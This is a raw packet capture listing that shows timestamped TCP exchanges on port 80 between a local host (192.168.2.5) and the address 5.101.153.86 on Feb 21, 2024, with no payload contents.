Feb 21, 2024 08:14:09.365962029 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365978956 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365998983 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.366020918 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366048098 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.366081953 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366100073 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366115093 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366127014 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.366177082 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366190910 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366230965 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366251945 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.366251945 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.366312027 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366419077 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366481066 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366508961 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.366652966 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366669893 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.366684914 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366700888 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366714954 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366728067 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366796017 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366808891 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366825104 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366836071 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.366856098 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366889954 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366902113 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366909027 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.366909981 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.366919994 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366972923 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.366992950 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.366992950 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.367033005 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367053986 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367115021 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367127895 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367142916 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367156982 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367163897 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.367172956 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367202044 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367209911 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.367255926 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.367419958 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367487907 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367500067 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367516041 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367585897 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.367585897 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.367623091 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367647886 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367666960 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367688894 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367706060 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.367706060 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.367717028 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367732048 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367784023 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367799044 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367811918 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367839098 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.367855072 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367868900 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.367894888 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.367924929 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368042946 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368057966 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368103981 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368252039 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368266106 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368302107 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368302107 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368369102 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368405104 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368418932 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368438005 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368438959 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368452072 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368496895 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368509054 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368511915 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368524075 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368541956 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368546963 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368557930 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368577003 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368577003 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368720055 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368735075 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368797064 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368812084 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368844986 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368855000 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368859053 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368871927 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368882895 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368885994 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368915081 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368917942 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368949890 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368963003 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.368974924 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.368990898 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.369275093 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.369822979 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.369884014 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370064974 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370079994 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370093107 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370106936 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370130062 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370156050 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370170116 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370179892 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.370179892 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.370250940 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.370413065 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370475054 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370511055 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370569944 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.370569944 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.370593071 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370629072 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370646954 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370680094 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.370781898 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370822906 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370862961 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.370893002 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.370971918 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.371614933 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.371686935 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.371701002 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.371716976 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.371731043 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.371747971 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.371750116 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.371778965 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.371814966 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.371829033 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.371870041 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.371870995 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.371901989 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.372257948 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.372272968 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.372303963 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.372337103 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.372423887 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.372555017 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.372567892 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.372611046 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.372647047 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.372786045 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.372798920 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.372850895 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.372875929 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373131037 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373147964 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373161077 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373195887 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373281002 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373281002 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373296976 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373333931 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373353958 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373364925 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373375893 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373435020 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373435020 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373460054 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373475075 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373488903 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373519897 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373552084 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373564959 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373578072 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373590946 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373604059 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373605967 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373616934 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373683929 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373686075 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373701096 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373714924 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373716116 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373729944 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373754978 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373758078 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373770952 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373786926 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373800039 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373826027 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373835087 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373867989 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373874903 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.373883009 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.373905897 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374033928 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374048948 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374088049 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374110937 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374110937 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374130011 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374144077 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374178886 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374193907 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374206066 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374232054 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374233961 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374248981 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374258041 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374258041 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374296904 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374310970 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374325991 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374346972 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374346972 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374355078 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374397993 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374412060 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374430895 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374447107 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374460936 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374466896 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374466896 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374499083 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374512911 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374525070 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374532938 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374532938 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374560118 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374586105 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374591112 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374618053 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374666929 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374681950 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374697924 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374716997 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374716997 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374727011 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374752045 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374758005 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374766111 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374799967 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374859095 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374859095 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374874115 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374887943 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374903917 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374937057 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374952078 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.374967098 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.374984980 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375000000 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375011921 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375032902 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375032902 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375072002 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375087023 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375099897 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375113964 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375119925 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375119925 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375159025 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375171900 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375206947 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375206947 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375238895 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375252008 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375274897 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375299931 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375324965 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375339031 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375366926 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375366926 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375380993 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375423908 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375438929 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375452995 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375484943 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375484943 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375499010 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375510931 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375530005 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375536919 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375536919 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375565052 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375596046 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375619888 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375644922 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375659943 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375679016 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375683069 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375713110 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375739098 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375823021 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375838041 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375849962 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375863075 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375874043 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375876904 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375901937 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375901937 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.375933886 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375946999 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.375962973 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376015902 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376030922 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376049995 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376050949 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376070023 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376084089 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376085997 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376097918 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376112938 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376122952 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376131058 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376199961 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376204967 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376216888 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376219988 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376246929 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376317978 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376329899 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376349926 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376372099 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376372099 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376393080 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376430035 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376473904 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376491070 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376502991 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.376509905 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376509905 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.376540899 CET	80	49716	5.101.153.86	192.168.2.5
